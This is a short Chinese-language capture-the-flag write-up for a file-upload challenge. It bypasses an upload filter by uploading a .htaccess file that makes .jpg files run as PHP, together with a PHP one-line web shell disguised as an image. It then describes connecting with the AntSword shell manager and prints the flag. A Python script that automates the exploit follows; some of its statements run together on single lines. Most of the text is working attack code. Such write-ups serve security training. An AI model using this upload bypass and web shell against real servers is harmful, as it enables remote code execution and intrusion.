尝试上传.htaccess和图片和一句话木马提示
php文件提示
响应头可以看到
构造一句话图片木马如下:
<script language='php'>eval($_POST['cmd']);</script> 上传成功
必须增加文件夹下jpg后缀解析php
.htaccess如下
<FilesMatch "jpg">SetHandler application/x-httpd-php</FilesMatch>
需要修改文件类型,image/jpeg,如下,上传成功
蚁剑链接
根据刚才上传图片木马的地址,用蚁剑链接如下
http://a756579c-2d99-4546-b126-d1099134f355.node5.buuoj.cn:81/upload/5337bb98317fcb575ce52329036efce2/u1.jpg
根目录下发现flag
flag{b35d29a2-b3da-42db-9f8b-9ca91436173e}
参考python方案:
import requests
url = "http://172.21.4.12:10011/"
session = requests.session()
htaccess = {'uploaded': ('.htaccess', "SetHandler application/x-httpd-php", 'image/jpeg')}
res_hta = session.post(url, files=htaccess)files = {'uploaded': ('123.jpg', "<script language=\"php\">echo file_get_contents(\"/flag\");</script>", 'image/jpeg')}
res_jpg = session.post(url, files=files)res_shell = session.post(url + res_jpg.text[-69:-22], data = {'a':'echo file_get_contents(\'/flag\');'})print(res_shell.text)